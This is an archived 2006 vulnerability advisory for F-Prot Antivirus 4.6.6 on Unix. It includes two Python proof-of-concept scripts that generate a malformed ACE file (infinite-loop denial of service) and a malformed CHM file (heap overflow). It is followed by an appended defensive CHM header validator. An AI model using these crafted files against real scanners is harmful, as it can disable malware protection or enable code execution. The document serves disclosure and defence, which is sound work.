fprot-dos.txt

06 Dec 2006. Reported by Evgeny Legerov. Type: packetstorm. Source: packetstormsecurity.com

F-Prot Antivirus for Unix: heap overflow and DoS, ACE and CHM file vulnerabilities

`Name: F-Prot Antivirus for Unix: heap overflow and Denial of Service  
Vendor: http://www.f-prot.com  
Release date: 4 Dec, 2006  
URL: http://gleg.net/fprot.txt  
Author: Evgeny Legerov <[email protected]>  
  
I. DESCRIPTION  
  
Two vulnerabilities in F-Prot Antivirus 4.6.6 for Unix platforms could allow a  
remote attacker to cause a DoS or execute arbitrary code.  
  
II. DETAILS  
  
1. ACE file Denial of Service  
When parsing a specially crafted ACE compressed file, F-Prot Antivirus will  
enter an infinite loop.  
See fprot1.py for more details.  
  
2. CHM file heap overflow  
When F-Prot Antivirus parses a specially crafted CHM file, a heap overflow  
will occur.  
See fprot2.py for more details.  
  
III. VENDOR RESPONSE  
  
Update to F-Prot 4.6.7:  
http://www.f-prot.com/news/gen_news/061201_release_unix467.html  
  
IV. EXPLOITS  
  
# fprot1.py - trivial proof of concept code for F-Prot 4.6.6 .ACE DoS  
#  
# Copyright (c) 2006 Evgeny Legerov  
#  
# Permission to use, copy, modify, and distribute this software for any  
# purpose with or without fee is hereby granted, provided that the above  
# copyright notice and this permission notice appear in all copies.  
#  
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES  
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF  
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR  
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES  
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN  
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF  
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.  
#  
# To test this code on Linux:  
#  
# create ACE compressed file  
# $ ./fprot1.py > 1.ace  
# $ f-prot 1.ace  
  
import sys  
import struct  
  
ACE="""  
58 c5 31 00 00 00 90 2a 2a 41 43 45 2a 2a 14 14  
02 00 31 12 82 33 b6 45 97 7d 00 00 00 00 16 2a  
55 4e 52 45 47 49 53 54 45 52 45 44 20 56 45 52  
53 49 4f 4e 2a 6c 28 2c 00 01 01 00 d0 ff ff ff  
00 00 00 00 41 42 43 44 41 42 43 44 00 00 00 00  
02 05 41 41 41 41 0d 00 41 41 41 41 41 41 41 41  
41 41 41 41 41  
"""  
  
s = ""  
for i in [chr(int(i, 16)) for i in ACE.split(" ") if len(i.strip()) > 0]:  
    s += i  
  
sys.stdout.write(s)  
  
# fprot2.py - trivial proof of concept code for F-Prot 4.6.6 .CHM heap  
# overflow  
#  
# Copyright (c) 2006 Evgeny Legerov  
#  
# Permission to use, copy, modify, and distribute this software for any  
# purpose with or without fee is hereby granted, provided that the above  
# copyright notice and this permission notice appear in all copies.  
#  
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES  
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF  
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR  
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES  
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN  
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF  
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.  
#  
# $ ./fprot2.py > 1.chm  
# $ f-prot 1.chm  
  
import sys  
import struct  
  
s=""  
s+="ITSF" # signature  
s+=struct.pack("<L",3) # version  
s+=struct.pack("<L",96) # header_len  
s+=struct.pack("<L",1) # unknown  
s+=struct.pack("<L",0x41424344) # last_modified  
s+=struct.pack("<L",0x419) # lang_id  
s+="A"*16 #dir_clsid  
s+="B"*16 #stream_clsid  
s+=struct.pack("<L",96) + "\x00" * 4 #sec0_offset  
s+=struct.pack("<L",24) + "\x00" * 4 #sec0_len  
s+=struct.pack("<L",120) + "\x00" *4 #dir_offset  
s+=struct.pack("<L",4180) + "\x00" * 4 #dir_len  
s+=struct.pack("<L",4300) + "\x00"*4 #data_offset  
s+="A"*24  
s+="ITSP"  
s+=struct.pack("<L", 1) # version  
s+=struct.pack("<L",0x54) # header_len  
s+=struct.pack("<L", 0xa) # unknown  
s+=struct.pack("<L",1000) # block_len - BUG?  
s+=struct.pack("<L",2) # blockidx  
s+=struct.pack("<L", 1) # index_depth  
s+=struct.pack("<L", -1) # index_root  
s+=struct.pack("<L",0) # index_head  
s+=struct.pack("<L",0) # index_tail  
s+=struct.pack("<L", -1) # unknown2  
s+=struct.pack("<L",1) # num_blocks  
s+=struct.pack("<L", 1033) # lang_id  
s+="A"*32  
s+="B"*10000  
  
sys.stdout.write(s)  
  
V. CREDIT  
  
Discovered by Evgeny Legerov.  
  
The vulnerabilities are part of VulnDisco Pack for CANVAS since Sep, 2006.  
  
  
  
  
`
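A defensive counterpart to fprot2.py, added here as an example (it is not code from the advisory or from F-Prot): a pre-parse check that cross-validates the ITSF and ITSP length fields against each other and against the file size. The field layout is taken from the comments in fprot2.py; the function names and the `MIN_BLOCK`/`MAX_BLOCK` limits are assumptions. With the PoC's header values, the declared `dir_len` of 4180 equals 84 + 4096 while `block_len` claims 1000, and this check rejects that mismatch.

```python
import struct

ITSF = struct.Struct("<4s5L16s16s5Q")   # 96-byte file header (v3, per fprot2.py)
ITSP = struct.Struct("<4s6L4l2L32s")    # 84-byte directory header
MIN_BLOCK, MAX_BLOCK = 64, 1 << 20      # assumed policy limits, not from the page

def check_chm(data):
    """Return reasons to reject `data` before any deeper parsing."""
    if len(data) < ITSF.size:
        return ["truncated ITSF header"]
    (sig, _ver, hdr_len, _unk, _mtime, _lang, _dclsid, _sclsid,
     _s0_off, _s0_len, dir_off, dir_len, _data_off) = ITSF.unpack_from(data)
    if sig != b"ITSF":
        return ["bad ITSF signature"]
    issues = []
    if hdr_len != ITSF.size:
        issues.append("unexpected ITSF header_len %d" % hdr_len)
    # Every declared region must lie inside the bytes actually present.
    if dir_off < ITSF.size or dir_len < ITSP.size or dir_off + dir_len > len(data):
        return issues + ["directory region invalid or outside the file"]
    (psig, _pver, phdr_len, _u1, block_len, _density, _depth, root, head,
     tail, _u2, num_blocks, _plang, _rest) = ITSP.unpack_from(data, dir_off)
    if psig != b"ITSP":
        return issues + ["bad ITSP signature"]
    if phdr_len != ITSP.size:
        issues.append("unexpected ITSP header_len %d" % phdr_len)
    if not MIN_BLOCK <= block_len <= MAX_BLOCK:
        issues.append("block_len %d outside policy limits" % block_len)
    # The directory length must agree with the block geometry it declares.
    expected = phdr_len + num_blocks * block_len
    if dir_len != expected:
        issues.append("dir_len %d, but blocks imply %d" % (dir_len, expected))
    if root != -1 and not 0 <= root < num_blocks:
        issues.append("index_root %d out of range" % root)
    for name, idx in (("index_head", head), ("index_tail", tail)):
        if not 0 <= idx < num_blocks:
            issues.append("%s %d out of range" % (name, idx))
    return issues

def sample(block_len, dir_len=84 + 4096):
    """Constructed header-only sample with a zero-filled body."""
    itsf = ITSF.pack(b"ITSF", 3, 96, 1, 0, 0x419, bytes(16), bytes(16),
                     96, 24, 120, dir_len, 120 + dir_len)
    itsp = ITSP.pack(b"ITSP", 1, 84, 0xA, block_len, 2, 1, -1, 0, 0, -1,
                     1, 1033, bytes(32))
    return (itsf + bytes(24) + itsp).ljust(120 + dir_len, b"\0")

if __name__ == "__main__":
    print(check_chm(sample(4096)), check_chm(sample(1000)))
```

A scanner front end would run a check like this before handing the file to the directory parser and treat any non-empty result as a malformed archive.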
